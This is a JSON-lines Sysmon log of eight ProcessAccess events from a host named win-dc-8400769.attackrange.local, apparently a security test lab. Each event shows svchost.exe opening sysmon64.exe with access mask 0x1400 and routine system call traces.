{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1523,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1524,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1525,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1526,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1527,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1528,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1529,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1530,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.803\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.803","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
